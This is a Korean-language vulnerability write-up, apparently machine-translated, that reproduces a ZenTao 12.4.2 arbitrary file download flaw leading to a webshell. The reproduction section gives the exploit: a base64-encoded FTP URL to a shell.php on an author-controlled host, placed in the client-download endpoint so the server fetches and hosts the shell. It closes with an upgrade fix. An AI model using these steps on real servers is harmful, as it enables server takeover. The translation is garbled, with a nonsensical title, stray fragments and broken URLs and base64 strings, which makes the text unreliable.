ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

0x00소개

ZenTao는 제품 관리, 프로젝트 관리, 품질 관리, 문서 관리, 조직 관리, 트랜잭션 관리를 통합하여 R&D 프로젝트의 핵심 프로세스를 완벽하게 다루는 국내 전문 오픈 소스 R&D 프로젝트 관리 소프트웨어입니다. 관리. 관리 아이디어는 국제적으로 대중화된 Agile 프로젝트 관리 방법인 Scrum을 기반으로 하며, 그 가치를 기반으로 국내 프로젝트 연구 개발 현황과 결합하여 작업 관리, 수요 관리, 버그 관리 등 여러 기능을 통합합니다. , 사용 사례 관리 등 소프트웨어를 계획부터 릴리스의 전체 수명 주기까지 포괄합니다.

0x01 취약점 개요

ZenTao 버전 12.4.2에는 임의 파일 다운로드 취약점이 있습니다. 이 취약점은 클라이언트 클래스의 다운로드 방법 필터링이 엄격하지 않고 ftp를 사용하여 파일을 다운로드할 수 있기 때문에 발생합니다. 그리고 다운로드한 파일 저장 디렉터리는 PHP 파일을 구문 분석하여 getshell을 유발할 수 있습니다.

0x02 영향을 받는 버전

ZenTao ≤ 12.4.2

0x03 환경 구축

phpstudy2018 + ZenTao 12.4.2 ZenTao 공식 다운로드 주소:

https://www.zentao.net/dynamic /zenta opms12. 4.2-80263.html

3.1.다운로드가 완료된 후 phpstudy에 넣고 설치하세요

3.2. 실패한 확장이 있으면 phpstudy에서 열어보세요.

3.3. 여기에서 데이터베이스 정보를 자신만의 데이터베이스 구성으로 설정하세요.

3.4. 계정을 설정하면 설치가 완료됩니다

3.4. 환경을 사용하여 ftp 서비스를 구축합니다. windows2008R2를 예로 들어 역할을 추가하고 ftp

3.5. 그런 다음 인터넷 정보 서비스 아래의 웹 사이트에 ftp 서비스를 추가합니다.

3.6 상황에 맞게 구성하고 다음 단계는

3.7입니다. 정상적으로 접속됨

0x04 취약점이 다시 나타남

1. 먼저 ftp 경로를 쉘에 추가하고 base64 인코딩을 수행하세요

암호화 전: ftp://192.168.3.200/shell.php

암호화 후: ZnRwJTNBLy8xOTIu MTY4LjMuMjAwL3NoZWxsLnBocA ==

2.EXP를 사용하여 암호화된 base64를 exp

http://127.0.0.1/zentaopms/www/index.php/client-download-1-에 넣습니다. 다운로드 링크>- 1.html

3 다음 링크 경로를 사용하여 쉘이 서버에 다운로드되었는지 테스트하세요

http://192.168.3.200/zentaopms/www/data/client /1/shell.php

0x05 복구 방법

1. ZenTao 12.4.3 이상 버전으로 업그레이드

위 내용은 ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!